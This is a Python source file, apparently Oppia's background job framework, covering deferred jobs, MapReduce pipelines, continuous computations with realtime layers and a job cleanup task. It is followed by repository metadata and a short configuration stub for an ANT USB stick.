def get_metadata(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.metadata
@classmethod
def get_output(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.output
@classmethod
def get_error(cls, job_id):
model = job_models.JobModel.get(job_id, strict=True)
cls._require_correct_job_type(model.job_type)
return model.error
@classmethod
def _require_valid_transition(
cls, job_id, old_status_code, new_status_code):
valid_new_status_codes = VALID_STATUS_CODE_TRANSITIONS[old_status_code]
if new_status_code not in valid_new_status_codes:
raise Exception(
'Invalid status code change for job %s: from %s to %s' %
(job_id, old_status_code, new_status_code))
@classmethod
def _require_correct_job_type(cls, job_type):
if job_type != cls.__name__:
raise Exception(
'Invalid job type %s for class %s' % (job_type, cls.__name__))
@classmethod
def _pre_enqueue_hook(cls, job_id):
pass
@classmethod
def _post_enqueue_hook(cls, job_id):
pass
@classmethod
def _pre_start_hook(cls, job_id):
pass
@classmethod
def _post_start_hook(cls, job_id):
pass
@classmethod
def _post_completed_hook(cls, job_id):
pass
@classmethod
def _post_failure_hook(cls, job_id):
pass
@classmethod
def _pre_cancel_hook(cls, job_id, cancel_message):
pass
@classmethod
def _post_cancel_hook(cls, job_id, cancel_message):
pass
class BaseDeferredJobManager(BaseJobManager):
@classmethod
def _run(cls, additional_job_params):
"""Function that performs the main business logic of the job.
Needs to be implemented by subclasses.
"""
raise NotImplementedError
@classmethod
def _run_job(cls, job_id, additional_job_params):
"""Starts the job."""
logging.info(
'Job %s started at %s' %
(job_id, utils.get_current_time_in_millisecs()))
cls.register_start(job_id)
try:
result = cls._run(additional_job_params)
except Exception as e:
logging.error(traceback.format_exc())
logging.error(
'Job %s failed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
cls.register_failure(
job_id, '%s\n%s' % (unicode(e), traceback.format_exc()))
raise taskqueue_services.PermanentTaskFailure(
'Task failed: %s\n%s' % (unicode(e), traceback.format_exc()))
# Note that the job may have been canceled after it started and before
# it reached this stage. This will result in an exception when the
# validity of the status code transition is checked.
cls.register_completion(job_id, result)
logging.info(
'Job %s completed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
"""Puts the job in the task queue.
Args:
- job_id: str, the id of the job.
- additional_job_params: dict of additional params to pass into the
job's _run() method.
"""
taskqueue_services.defer(cls._run_job, job_id, additional_job_params)
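# A minimal sketch (hypothetical; not part of this module) of a concrete
# deferred job. Subclasses only implement _run(); creation, enqueueing, status
# transitions and failure handling are all inherited from BaseJobManager:
#
#   class CountWidgetsJob(BaseDeferredJobManager):
#       @classmethod
#       def _run(cls, additional_job_params):
#           return widget_models.WidgetModel.query().count()  # hypothetical model
#
#   job_id = CountWidgetsJob.create_new()
#   CountWidgetsJob.enqueue(job_id)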
class MapReduceJobPipeline(base_handler.PipelineBase):
def run(self, job_id, job_class_str, kwargs):
job_class = mapreduce_util.for_name(job_class_str)
job_class.register_start(job_id, metadata={
job_class._OUTPUT_KEY_ROOT_PIPELINE_ID: self.root_pipeline_id
})
# TODO(sll): Need try/except/mark-as-canceled here?
output = yield mapreduce_pipeline.MapreducePipeline(**kwargs)
yield StoreMapReduceResults(job_id, job_class_str, output)
def finalized(self):
# Suppress the default Pipeline behavior of sending email.
# TODO(sll): Should mark-as-done be here instead?
pass
class StoreMapReduceResults(base_handler.PipelineBase):
def run(self, job_id, job_class_str, output):
job_class = mapreduce_util.for_name(job_class_str)
try:
iterator = input_readers.RecordsReader(output, 0)
results_list = []
for item in iterator:
# Map/reduce puts reducer output into blobstore files as a
# string obtained via "str(result)". Use AST as a safe
# alternative to eval() to get the Python object back.
results_list.append(ast.literal_eval(item))
job_class.register_completion(job_id, results_list)
except Exception as e:
logging.error(traceback.format_exc())
logging.error(
'Job %s failed at %s' %
(job_id, utils.get_current_time_in_millisecs()))
job_class.register_failure(
job_id,
'%s\n%s' % (unicode(e), traceback.format_exc()))
class BaseMapReduceJobManager(BaseJobManager):
# The output for this job is a list of individual results. Each item in
# the list will be of whatever type is yielded from the 'reduce' method.
#
# The 'metadata' field in the BaseJob representing a MapReduceJob
# is a dict with one key, _OUTPUT_KEY_ROOT_PIPELINE_ID. The corresponding
# value is a string representing the ID of the MapReduceJobPipeline
# as known to the mapreduce/lib/pipeline internals. This is used
# to generate URLs pointing at the pipeline support UI.
_OUTPUT_KEY_ROOT_PIPELINE_ID = 'root_pipeline_id'
@staticmethod
def get_mapper_param(param_name):
mapper_params = context.get().mapreduce_spec.mapper.params
if param_name not in mapper_params:
raise Exception(
'Could not find %s in %s' % (param_name, mapper_params))
        return mapper_params[param_name]
@classmethod
def entity_classes_to_map_over(cls):
"""Return a list of reference to the datastore classes to map over."""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement '
'entity_classes_to_map_over()')
@staticmethod
def map(item):
"""Implements the map function. Must be declared @staticmethod.
Args:
            item: The parameter passed to this function is a single element of
                one of the types returned by entity_classes_to_map_over(). This
                function may yield as many times as appropriate (including
                zero) to return key/value 2-tuples.
For example, to get a count of all explorations, one might yield
(exploration.id, 1).
WARNING: The OutputWriter converts mapper output keys to type str.
So, if you have keys that are of type unicode, you must yield
"key.encode('utf-8')", rather than "key".
"""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement map '
'as a @staticmethod.')
@staticmethod
def reduce(key, values):
"""Implements the reduce function. Must be declared @staticmethod.
This function should yield whatever it likes; the recommended thing to
do is emit entities. All emitted outputs from all reducers will be
collected in an array and set into the output value for the job, so
don't pick anything huge. If you need something huge, persist it out
into the datastore instead and return a reference (and dereference it
later to load content as needed).
Args:
key: A key value as emitted from the map() function, above.
values: A list of all values from all mappers that were tagged with
the given key. This code can assume that it is the only process
handling values for this key. (It can probably also assume that
it will be called exactly once for each key with all of the output,
but this needs to be verified.)
"""
raise NotImplementedError(
'Classes derived from BaseMapReduceJobManager must implement '
'reduce as a @staticmethod.')
@classmethod
def _real_enqueue(cls, job_id, additional_job_params):
entity_class_types = cls.entity_classes_to_map_over()
entity_class_names = [
'%s.%s' % (
entity_class_type.__module__, entity_class_type.__name__)
for entity_class_type in entity_class_types]
kwargs = {
'job_name': job_id,
'mapper_spec': '%s.%s.map' % (cls.__module__, cls.__name__),
'reducer_spec': '%s.%s.reduce' % (cls.__module__, cls.__name__),
'input_reader_spec': (
'core.jobs.MultipleDatastoreEntitiesInputReader'),
'output_writer_spec': (
'mapreduce.output_writers.BlobstoreRecordsOutputWriter'),
'mapper_params': {
MAPPER_PARAM_KEY_ENTITY_KINDS: entity_class_names,
# Note that all parameters passed to the mapper need to be
# strings. Also note that the value for this key is determined
# just before enqueue time, so it will be roughly equal to the
# actual enqueue time.
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS: str(
utils.get_current_time_in_millisecs()),
}
}
if additional_job_params is not None:
for param_name in additional_job_params:
if param_name in kwargs['mapper_params']:
raise Exception(
'Additional job param %s shadows an existing mapper '
'param' % param_name)
kwargs['mapper_params'][param_name] = copy.deepcopy(
additional_job_params[param_name])
mr_pipeline = MapReduceJobPipeline(
job_id, '%s.%s' % (cls.__module__, cls.__name__), kwargs)
mr_pipeline.start(base_path='/mapreduce/worker/pipeline')
@classmethod
def _pre_cancel_hook(cls, job_id, cancel_message):
metadata = cls.get_metadata(job_id)
root_pipeline_id = metadata[cls._OUTPUT_KEY_ROOT_PIPELINE_ID]
pipeline.Pipeline.from_id(root_pipeline_id).abort(cancel_message)
@staticmethod
def _entity_created_before_job_queued(entity):
"""Checks that the given entity was created before the MR job was queued.
Mapper methods may want to use this as a precomputation check,
especially if the datastore classes being iterated over are append-only
event logs.
"""
created_on_msec = utils.get_time_in_millisecs(entity.created_on)
job_queued_msec = float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
return job_queued_msec >= created_on_msec
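# A minimal sketch (hypothetical; not part of this module) of a concrete
# MapReduce job: count entities per exploration. Note that map() and reduce()
# must be declared @staticmethod, and reducer values arrive stringified:
#
#   class ExplorationCounterJob(BaseMapReduceJobManager):
#       @classmethod
#       def entity_classes_to_map_over(cls):
#           return [exp_models.ExplorationModel]  # hypothetical model class
#
#       @staticmethod
#       def map(item):
#           # Keys must be str, so encode unicode ids before yielding.
#           yield (item.id.encode('utf-8'), 1)
#
#       @staticmethod
#       def reduce(key, stringified_values):
#           yield (key, sum(int(v) for v in stringified_values))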
class MultipleDatastoreEntitiesInputReader(input_readers.InputReader):
_ENTITY_KINDS_PARAM = 'entity_kinds'
_READER_LIST_PARAM = 'readers'
def __init__(self, reader_list):
self._reader_list = reader_list
def __iter__(self):
for reader in self._reader_list:
yield reader
@classmethod
def from_json(cls, input_shard_state):
return cls(input_readers.DatastoreInputReader.from_json(
input_shard_state[cls._READER_LIST_PARAM]))
def to_json(self):
return {
self._READER_LIST_PARAM: self._reader_list.to_json()
}
@classmethod
def split_input(cls, mapper_spec):
params = mapper_spec.params
entity_kinds = params.get(cls._ENTITY_KINDS_PARAM)
splits = []
for entity_kind in entity_kinds:
new_mapper_spec = copy.deepcopy(mapper_spec)
new_mapper_spec.params['entity_kind'] = entity_kind
splits.append(
input_readers.DatastoreInputReader.split_input(
new_mapper_spec))
inputs = []
for split in splits:
for item in split:
inputs.append(MultipleDatastoreEntitiesInputReader(item))
return inputs
@classmethod
def validate(cls, mapper_spec):
return True # TODO
class BaseMapReduceJobManagerForContinuousComputations(BaseMapReduceJobManager):
@classmethod
def _get_continuous_computation_class(cls):
"""Returns the ContinuousComputationManager class associated with this
MapReduce job.
"""
raise NotImplementedError(
'Subclasses of BaseMapReduceJobManagerForContinuousComputations '
'must implement the _get_continuous_computation_class() method.')
@staticmethod
def _get_job_queued_msec():
return float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
@staticmethod
def _entity_created_before_job_queued(entity):
"""Checks that the given entity was created before the MR job was queued.
Mapper methods may want to use this as a precomputation check,
especially if the datastore classes being iterated over are append-only
event logs.
"""
created_on_msec = utils.get_time_in_millisecs(entity.created_on)
job_queued_msec = float(context.get().mapreduce_spec.mapper.params[
MAPPER_PARAM_KEY_QUEUED_TIME_MSECS])
return job_queued_msec >= created_on_msec
@classmethod
def _post_completed_hook(cls, job_id):
cls._get_continuous_computation_class().on_batch_job_completion()
@classmethod
def _post_cancel_hook(cls, job_id, cancel_message):
cls._get_continuous_computation_class().on_batch_job_canceled()
@classmethod
def _post_failure_hook(cls, job_id):
cls._get_continuous_computation_class().on_batch_job_failure()
class BaseRealtimeDatastoreClassForContinuousComputations(
base_models.BaseModel):
"""Storage class for entities in the realtime layer.
Instances of this class represent individual entities that are stored in
the realtime datastore. Note that the realtime datastore may be formatted
differently from the datastores that are iterated over by the MapReduce
job.
The IDs for instances of this class are of the form 0:... or 1:..., where
the 0 or 1 indicates the realtime layer that the entity is in.
NOTE TO DEVELOPERS: Ensure that you wrap the id with get_realtime_id()
when doing creations, gets, puts and queries, in order to ensure that the
relevant layer prefix gets appended.
"""
realtime_layer = ndb.IntegerProperty(required=True, choices=[0, 1])
@classmethod
def get_realtime_id(cls, layer_index, raw_entity_id):
"""Returns an ID used to identify the element with the given entity id
in the currently active realtime datastore layer.
"""
return '%s:%s' % (layer_index, raw_entity_id)
@classmethod
def delete_layer(cls, layer_index, latest_created_on_datetime):
"""Deletes all entities in the given layer which were created before
the given datetime.
"""
query = cls.query().filter(cls.realtime_layer == layer_index).filter(
cls.created_on < latest_created_on_datetime)
ndb.delete_multi(query.iter(keys_only=True))
@classmethod
def _is_valid_realtime_id(cls, realtime_id):
return realtime_id.startswith('0:') or realtime_id.startswith('1:')
@classmethod
def get(cls, entity_id, strict=True):
if not cls._is_valid_realtime_id(entity_id):
raise ValueError('Invalid realtime id: %s' % entity_id)
return super(
BaseRealtimeDatastoreClassForContinuousComputations, cls
).get(entity_id, strict=strict)
def put(self):
if (self.realtime_layer is None or
str(self.realtime_layer) != self.id[0]):
raise Exception(
'Realtime layer %s does not match realtime id %s' %
(self.realtime_layer, self.id))
return super(
BaseRealtimeDatastoreClassForContinuousComputations, self).put()
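# A minimal sketch (mirroring StartExplorationRealtimeModel in
# core/jobs_test.py, referenced in the docstrings below) of a realtime
# datastore class and its layer-prefixed ids:
#
#   class StartExplorationRealtimeModel(
#           BaseRealtimeDatastoreClassForContinuousComputations):
#       count = ndb.IntegerProperty(default=0)
#
#   # The layer-0 entity for exploration 'exp1' gets the id '0:exp1'.
#   realtime_id = StartExplorationRealtimeModel.get_realtime_id(0, 'exp1')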
class BaseContinuousComputationManager(object):
"""This class represents a manager for a continuously-running computation.
Such computations consist of two parts: a batch job to compute summary
views, and a realtime layer to augment these batch views with additional
data that has come in since the last batch job results were computed. The
realtime layer may provide only approximate results, but the discrepancy
should be small because the realtime layer is expected to handle a much
smaller amount of data than the batch layer.
The batch jobs are run continuously, with each batch job starting
immediately after the previous run has finished. There are two realtime
layers that are cleared alternatively after successive batch runs, just
before a new batch job is enqueued. Events are recorded to all three
layers.
Here is a schematic showing how this works. The x-axis represents the
progression of time. The arrowed intervals in the batch layer indicate how
long the corresponding batch job takes to run, and the intervals in each
realtime layer indicate spans between when the data in the realtime layer
is cleared. Note that a realtime layer is cleared as part of the post-
processing that happens when a batch job completes, which explains why the
termination of each batch interval and one of the realtime intervals
always coincides. Having two realtime layers allows the inactive layer to
be cleared whilst not affecting incoming queries to the active layer.
Batch layer <-----> <-------> <-------> <-------> <-------->
Realtime layer R0 <-----> <------------------> <------------------>
Realtime layer R1 <----------------> <-----------------> <------ ...
<-- A --> <-- B -->
For example, queries arising during the time interval A will use the
results of the first batch run, plus data from the realtime layer R1.
Queries arising during the time interval B will use the results of the
second batch run, plus data from the realtime layer R0.
"""
# TODO(sll): In the previous docstring, quantify what 'small' means
# once we have some experience with this running in production.
@classmethod
def get_event_types_listened_to(cls):
"""Returns a list of event types that this class subscribes to."""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'get_event_types_listened_to(). This method should return a list '
'of strings, each representing an event type that this class '
'subscribes to.')
@classmethod
def _get_realtime_datastore_class(cls):
"""Returns the datastore class used by the realtime layer, which should
subclass BaseRealtimeDatastoreClassForContinuousComputations. See
StartExplorationRealtimeModel in core/jobs_test.py for an example
of how to do this.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'_get_realtime_datastore_class(). This method should return '
'the datastore class to be used by the realtime layer.')
@classmethod
def _get_batch_job_manager_class(cls):
"""Returns the manager class for the continuously-running batch job.
See jobs_test.py for an example of how to do this.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
            '_get_batch_job_manager_class(). This method should return the '
'manager class for the continuously-running batch job.')
@classmethod
def _handle_incoming_event(
cls, active_realtime_layer, event_type, *args, **kwargs):
"""Records incoming events in the given realtime layer.
This method should be implemented by subclasses. The args are the
same as those sent to the event handler corresponding to the event
type. Note that there may be more than one event type.
IMPORTANT: This method only gets called as part of the dequeue process
from a deferred task queue. Developers should expect a delay to occur
between when the incoming event arrives and when this method is called,
and should resolve any arguments that depend on local session
variables (such as the user currently in session) before enqueueing
this method in the corresponding event handler.
IMPORTANT: If an exception is raised here, the task queue will retry
calling it and any mutations made will be redone -- unless the
exception has type taskqueue_services.PermanentTaskFailure. Developers
should therefore ensure that _handle_incoming_event() is robust to
multiple calls for the same incoming event.
"""
raise NotImplementedError(
'Subclasses of BaseContinuousComputationManager must implement '
'_handle_incoming_event(...). Please check the docstring of this '
'method in jobs.BaseContinuousComputationManager for important '
'developer information.')
@classmethod
def _get_active_realtime_index(cls):
def _get_active_realtime_index_transactional():
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__, strict=False)
if cc_model is None:
cc_model = job_models.ContinuousComputationModel(
id=cls.__name__)
cc_model.put()
return cc_model.active_realtime_layer_index
return transaction_services.run_in_transaction(
_get_active_realtime_index_transactional)
@classmethod
def get_active_realtime_layer_id(cls, entity_id):
"""Returns an ID used to identify the element with the given entity id
in the currently active realtime datastore layer.
"""
return cls._get_realtime_datastore_class().get_realtime_id(
cls._get_active_realtime_index(), entity_id)
@classmethod
def _switch_active_realtime_class(cls):
def _switch_active_realtime_class_transactional():
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__)
cc_model.active_realtime_layer_index = (
1 - cc_model.active_realtime_layer_index)
cc_model.put()
transaction_services.run_in_transaction(
_switch_active_realtime_class_transactional)
@classmethod
def _clear_inactive_realtime_layer(
cls, latest_created_on_datetime):
"""Deletes all entries in the given realtime datastore class whose
created_on date is before latest_timestamp.
"""
inactive_realtime_index = 1 - cls._get_active_realtime_index()
cls._get_realtime_datastore_class().delete_layer(
inactive_realtime_index, latest_created_on_datetime)
@classmethod
def _kickoff_batch_job(cls):
"""Create and enqueue a new batch job."""
if job_models.JobModel.do_unfinished_jobs_exist(cls.__name__):
logging.error(
'Tried to start a new batch job of type %s while an existing '
                'job was still running.' % cls.__name__)
return
job_manager = cls._get_batch_job_manager_class()
job_id = job_manager.create_new()
job_manager.enqueue(job_id)
@classmethod
def _register_end_of_batch_job_and_return_status(cls):
"""Processes a 'job finished' event and returns the job's updated status
code.
Note that 'finish' in this context might mean 'completed successfully'
or 'failed'.
Processing means the following: if the job is currently 'stopping', its
status is set to 'idle'; otherwise, its status remains as 'running'.
"""
def _register_end_of_batch_job_transactional():
"""Transactionally change the computation's status when a batch job
ends."""
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
if (cc_model.status_code ==
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_STOPPING):
cc_model.status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
cc_model.put()
return cc_model.status_code
return transaction_services.run_in_transaction(
_register_end_of_batch_job_transactional)
@classmethod
def get_status_code(cls):
"""Returns the status code of the job."""
return job_models.ContinuousComputationModel.get(
cls.__name__).status_code
@classmethod
def start_computation(cls):
"""(Re)starts the continuous computation corresponding to this class.
Raises an Exception if the computation is already running.
"""
def _start_computation_transactional():
"""Transactional implementation for marking a continuous
computation as started.
"""
cc_model = job_models.ContinuousComputationModel.get(
cls.__name__, strict=False)
if cc_model is None:
cc_model = job_models.ContinuousComputationModel(
id=cls.__name__)
if (cc_model.status_code !=
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE):
raise Exception(
'Attempted to start computation %s, which is already '
'running.' % cls.__name__)
cc_model.status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING)
cc_model.last_started_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_start_computation_transactional)
cls._clear_inactive_realtime_layer(datetime.datetime.utcnow())
cls._kickoff_batch_job()
@classmethod
def stop_computation(cls, user_id, test_mode=False):
"""Cancels the currently-running batch job.
No further batch runs will be kicked off.
"""
# This is not an ancestor query, so it must be run outside a
# transaction.
do_unfinished_jobs_exist = (
job_models.JobModel.do_unfinished_jobs_exist(
cls._get_batch_job_manager_class().__name__))
def _stop_computation_transactional():
"""Transactional implementation for marking a continuous
computation as stopping/idle.
"""
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
# If there is no job currently running, go to IDLE immediately.
new_status_code = (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_STOPPING if
do_unfinished_jobs_exist else
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE)
cc_model.status_code = new_status_code
cc_model.last_stopped_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_stop_computation_transactional)
# The cancellation must be done after the continuous computation
# status update.
if do_unfinished_jobs_exist:
unfinished_job_models = job_models.JobModel.get_unfinished_jobs(
cls._get_batch_job_manager_class().__name__)
for job_model in unfinished_job_models:
cls._get_batch_job_manager_class().cancel(
job_model.id, user_id)
@classmethod
def on_incoming_event(cls, event_type, *args, **kwargs):
"""Handle an incoming event by recording it in both realtime datastore
layers.
The *args and **kwargs match those passed to the _handle_event() method
of the corresponding EventHandler subclass.
"""
REALTIME_LAYERS = [0, 1]
for layer in REALTIME_LAYERS:
cls._handle_incoming_event(layer, event_type, *args, **kwargs)
@classmethod
def _process_job_completion_and_return_status(cls):
"""Delete all data in the currently-active realtime_datastore class,
switch the active class, and return the status.
This seam was created so that tests would be able to override
on_batch_job_completion() to avoid kicking off the next job
immediately.
"""
cls._switch_active_realtime_class()
cls._clear_inactive_realtime_layer(datetime.datetime.utcnow())
def _update_last_finished_time_transactional():
cc_model = job_models.ContinuousComputationModel.get(cls.__name__)
cc_model.last_finished_msec = utils.get_current_time_in_millisecs()
cc_model.put()
transaction_services.run_in_transaction(
_update_last_finished_time_transactional)
return cls._register_end_of_batch_job_and_return_status()
@classmethod
def _kickoff_batch_job_after_previous_one_ends(cls):
"""Seam that can be overridden by tests."""
cls._kickoff_batch_job()
@classmethod
def on_batch_job_completion(cls):
"""Called when a batch job completes."""
job_status = cls._process_job_completion_and_return_status()
if job_status == job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING:
cls._kickoff_batch_job_after_previous_one_ends()
@classmethod
def on_batch_job_canceled(cls):
logging.info('Job %s canceled.' % cls.__name__)
# The job should already be stopping, and should therefore be marked
# idle.
job_status = cls._register_end_of_batch_job_and_return_status()
if job_status != job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE:
logging.error(
'Batch job for computation %s canceled but status code not set '
'to idle.' % cls.__name__)
@classmethod
def on_batch_job_failure(cls):
# TODO(sll): Alert the site admin via email.
logging.error('Job %s failed.' % cls.__name__)
job_status = cls._register_end_of_batch_job_and_return_status()
if job_status == job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING:
cls._kickoff_batch_job_after_previous_one_ends()
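# A minimal sketch (hypothetical; not part of this module) of how the three
# abstract methods of a continuous computation are wired together:
#
#   class StartExplorationEventCounter(BaseContinuousComputationManager):
#       @classmethod
#       def get_event_types_listened_to(cls):
#           return ['start_exploration']  # hypothetical event type
#
#       @classmethod
#       def _get_realtime_datastore_class(cls):
#           return StartExplorationRealtimeModel
#
#       @classmethod
#       def _get_batch_job_manager_class(cls):
#           return StartExplorationMRJobManager  # hypothetical MR job manager
#
#       @classmethod
#       def _handle_incoming_event(
#               cls, active_realtime_layer, event_type, exp_id, **kwargs):
#           # The task queue may retry this handler, so real implementations
#           # should guard against double-counting (e.g. with transactions).
#           datastore_class = cls._get_realtime_datastore_class()
#           realtime_id = datastore_class.get_realtime_id(
#               active_realtime_layer, exp_id)
#           model = datastore_class.get(realtime_id, strict=False)
#           if model is None:
#               model = datastore_class(
#                   id=realtime_id, realtime_layer=active_realtime_layer,
#                   count=1)
#           else:
#               model.count += 1
#           model.put()
#
#   StartExplorationEventCounter.start_computation()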
def _get_job_dict_from_job_model(model):
"""Converts an ndb.Model representing a job to a dict.
The dict contains the following keys:
- 'id': the job id
- 'time_started_msec': when the job was started, in milliseconds since the
epoch
- 'time_finished_msec': when the job was finished, in milliseconds since
the epoch
- 'status_code': the current status of the job
- 'job_type': the type of this job
- 'is_cancelable': whether the job can be canceled
- 'error': any errors pertaining to this job
    - 'human_readable_time_started': a human-readable string representing the
        time the job started, or the empty string if time_started_msec is None.
    - 'human_readable_time_finished': a human-readable string representing the
        time the job finished, or the empty string if time_finished_msec is
        None.
"""
return {
'id': model.id,
'time_started_msec': model.time_started_msec,
'time_finished_msec': model.time_finished_msec,
'status_code': model.status_code,
'job_type': model.job_type,
'is_cancelable': model.is_cancelable,
'error': model.error,
'human_readable_time_started': (
'' if model.time_started_msec is None
else utils.get_human_readable_time_string(model.time_started_msec)),
'human_readable_time_finished': (
'' if model.time_finished_msec is None
else utils.get_human_readable_time_string(
model.time_finished_msec)),
}
def get_data_for_recent_jobs(recency_msec=DEFAULT_RECENCY_MSEC):
"""Get a list containing data about recent jobs.
This list is arranged in descending order based on the time the job
was enqueued. At most NUM_JOBS_IN_DASHBOARD_LIMIT job descriptions are
returned.
Args:
    - recency_msec: the threshold for a recent job, in milliseconds.
"""
recent_job_models = job_models.JobModel.get_recent_jobs(
NUM_JOBS_IN_DASHBOARD_LIMIT, recency_msec)
return [_get_job_dict_from_job_model(model) for model in recent_job_models]
def get_data_for_unfinished_jobs():
"""Get a list containing data about all unfinished jobs."""
unfinished_job_models = job_models.JobModel.get_all_unfinished_jobs(
NUM_JOBS_IN_DASHBOARD_LIMIT)
return [_get_job_dict_from_job_model(model)
for model in unfinished_job_models]
def get_job_output(job_id):
"""Returns the output of a job."""
return job_models.JobModel.get_by_id(job_id).output
def get_continuous_computations_info(cc_classes):
"""Returns data about the given computations.
Args:
cc_classes: a list of subclasses of BaseContinuousComputationManager.
Returns:
A list of dicts, each representing a continuous computation. Each dict
has the following keys:
- 'computation_type': the type of the computation
- 'status_code': the current status of the computation
- 'last_started_msec': when a batch job for the computation was last
started, in milliseconds since the epoch
- 'last_finished_msec': when a batch job for the computation last
finished, in milliseconds since the epoch
- 'last_stopped_msec': when a batch job for the computation was last
stopped, in milliseconds since the epoch
- 'active_realtime_layer_index': the index of the active realtime layer
- 'is_startable': whether an admin should be allowed to start this
computation
- 'is_stoppable': whether an admin should be allowed to stop this
computation
"""
cc_models = job_models.ContinuousComputationModel.get_multi(
[cc_class.__name__ for cc_class in cc_classes])
result = []
for ind, model in enumerate(cc_models):
if model is None:
cc_dict = {
'computation_type': cc_classes[ind].__name__,
'status_code': 'never_started',
'last_started_msec': None,
'last_finished_msec': None,
'last_stopped_msec': None,
'active_realtime_layer_index': None,
'is_startable': True,
'is_stoppable': False,
}
else:
cc_dict = {
'computation_type': cc_classes[ind].__name__,
'status_code': model.status_code,
'last_started_msec': model.last_started_msec,
'last_finished_msec': model.last_finished_msec,
'last_stopped_msec': model.last_stopped_msec,
'active_realtime_layer_index': (
model.active_realtime_layer_index),
# TODO(sll): If a job is stopping, can it be started while it
# is in the process of stopping?
'is_startable': model.status_code == (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_IDLE),
'is_stoppable': model.status_code == (
job_models.CONTINUOUS_COMPUTATION_STATUS_CODE_RUNNING),
}
result.append(cc_dict)
return result
def get_stuck_jobs(recency_msecs):
"""Returns a list of jobs which were last updated at most recency_msecs
milliseconds ago and have experienced more than one retry."""
    threshold_time = (
        datetime.datetime.utcnow() -
        datetime.timedelta(milliseconds=recency_msecs))
shard_state_model_class = mapreduce_model.ShardState
# TODO(sll): Clean up old jobs so that this query does not have to iterate
# over so many elements in a full table scan.
recent_job_models = shard_state_model_class.all()
stuck_jobs = []
for job_model in recent_job_models:
if job_model.update_time > threshold_time and job_model.retries > 0:
stuck_jobs.append(job_model)
return stuck_jobs
class JobCleanupManager(BaseMapReduceJobManager):
"""One-off job for cleaning up old auxiliary entities for MR jobs."""
@classmethod
def entity_classes_to_map_over(cls):
return [
mapreduce_model.MapreduceState,
mapreduce_model.ShardState
]
@staticmethod
def map(item):
max_start_time_msec = JobCleanupManager.get_mapper_param(
MAPPER_PARAM_MAX_START_TIME_MSEC)
if isinstance(item, mapreduce_model.MapreduceState):
if (item.result_status == 'success' and
utils.get_time_in_millisecs(item.start_time) <
max_start_time_msec):
item.delete()
yield ('mr_state_deleted', 1)
else:
yield ('mr_state_remaining', 1)
if isinstance(item, mapreduce_model.ShardState):
if (item.result_status == 'success' and
utils.get_time_in_millisecs(item.update_time) <
max_start_time_msec):
item.delete()
yield ('shard_state_deleted', 1)
else:
yield ('shard_state_remaining', 1)
@staticmethod
def reduce(key, stringified_values):
values = [ast.literal_eval(v) for v in stringified_values]
if key.endswith('_deleted'):
logging.warning(
'Delete count: %s entities (%s)' % (sum(values), key))
else:
logging.warning(
'Entities remaining count: %s entities (%s)' %
(sum(values), key))
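# A usage sketch (hypothetical scheduling code): the cleanup job reads the
# extra mapper param declared at the top of this module, so callers supply it
# via additional_job_params when enqueueing:
#
#   job_id = JobCleanupManager.create_new()
#   JobCleanupManager.enqueue(job_id, additional_job_params={
#       MAPPER_PARAM_MAX_START_TIME_MSEC: (
#           utils.get_current_time_in_millisecs() - DEFAULT_RECENCY_MSEC)
#   })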
ABSTRACT_BASE_CLASSES = frozenset([
BaseJobManager, BaseDeferredJobManager, BaseMapReduceJobManager,
BaseMapReduceJobManagerForContinuousComputations])
| {
"content_hash": "4a669e77d4f37b1e699265f988817a26",
"timestamp": "",
"source": "github",
"line_count": 1188,
"max_line_length": 81,
"avg_line_length": 40.19191919191919,
"alnum_prop": 0.6383932311300997,
"repo_name": "wangsai/oppia",
"id": "0b48a1be644d5cc27e7da4b9ad90c50d4a7f39c5",
"size": "48371",
"binary": false,
"copies": "9",
"ref": "refs/heads/master",
"path": "core/jobs.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "C",
"bytes": "363"
},
{
"name": "CSS",
"bytes": "44925"
},
{
"name": "HTML",
"bytes": "256657"
},
{
"name": "JavaScript",
"bytes": "1264158"
},
{
"name": "Python",
"bytes": "1421858"
},
{
"name": "Shell",
"bytes": "24808"
}
],
"symlink_target": ""
} |
from ant.core import log
# USB1 ANT stick interface. Running `dmesg | tail -n 25` after plugging the
# stick on a USB port should tell you the exact interface.
SERIAL = '/dev/ttyUSB0'
# If set to True, the stick's driver will dump everything it reads/writes
# from/to the stick.
DEBUG = False
# Set to None to disable logging
LOG = None
#LOG = log.LogWriter()
# ========== DO NOT CHANGE ANYTHING BELOW THIS LINE ==========
if LOG is not None:
print "Using log file:", LOG.filename
print ""
| {
"content_hash": "a6a65c3700a7bd2ce598aa80e4d8ae37",
"timestamp": "",
"source": "github",
"line_count": 18,
"max_line_length": 75,
"avg_line_length": 27.555555555555557,
"alnum_prop": 0.6935483870967742,
